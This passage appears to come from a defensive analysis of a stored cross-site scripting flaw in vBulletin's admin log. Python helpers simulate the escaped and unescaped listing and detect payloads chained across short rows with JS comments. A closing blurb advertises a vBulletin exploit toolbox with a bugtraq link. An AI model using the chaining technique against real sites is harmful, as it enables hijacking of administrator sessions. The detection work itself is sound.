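def render(rows, escape):
    """Simulate the adminlog.php listing, one table row per entry (assumed layout).
    escape=False reproduces the vulnerable unescaped output, escape=True the fix."""
    enc = html.escape if escape else (lambda s: s)
    return "".join(
        f"<tr><td>{enc(script)}</td><td>{enc(action)}</td></tr>\n"
        for script, action in rows)


def contains_script_block(page):
    """True if the rendered listing contains a complete <script>...</script>."""
    return SCRIPT_BLOCK.search(page) is not None


def effective_js(page):
    """What a browser would run from an unescaped listing: the script body with the
    /* ... */ comments removed. The comments swallow the table markup between rows,
    which is why 20 characters per row are enough to chain a payload."""
    m = SCRIPT_BLOCK.search(page)
    return re.sub(r"/\*.*?\*/", "", m.group(1), flags=re.S).strip() if m else ""


def suspicious_rows(rows):
    """Indexes of entries carrying markup or JS-comment fragments, or exceeding the
    sizes the application itself would ever log for a real request."""
    return [i for i, (script, action) in enumerate(rows)
            if FRAGMENT_MARKERS.search(script) or FRAGMENT_MARKERS.search(action)
            or len(script) > SCRIPT_MAX or len(action) > ACTION_MAX]
```

Per-row inspection alone misses the point of the technique: no single 20-character field is a script by itself, so the check that matters is the one run over the rendered listing.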
vbulletin Exploit Tool Box
This box contains the 3 vbulletin exploits; with it you can use the vbulletin install path exploit, the other two exploits can only be viewed.
Code can be found here: http://archive.cert.uni-stuttgart.de/bugtraq/2006/10/msg00243.html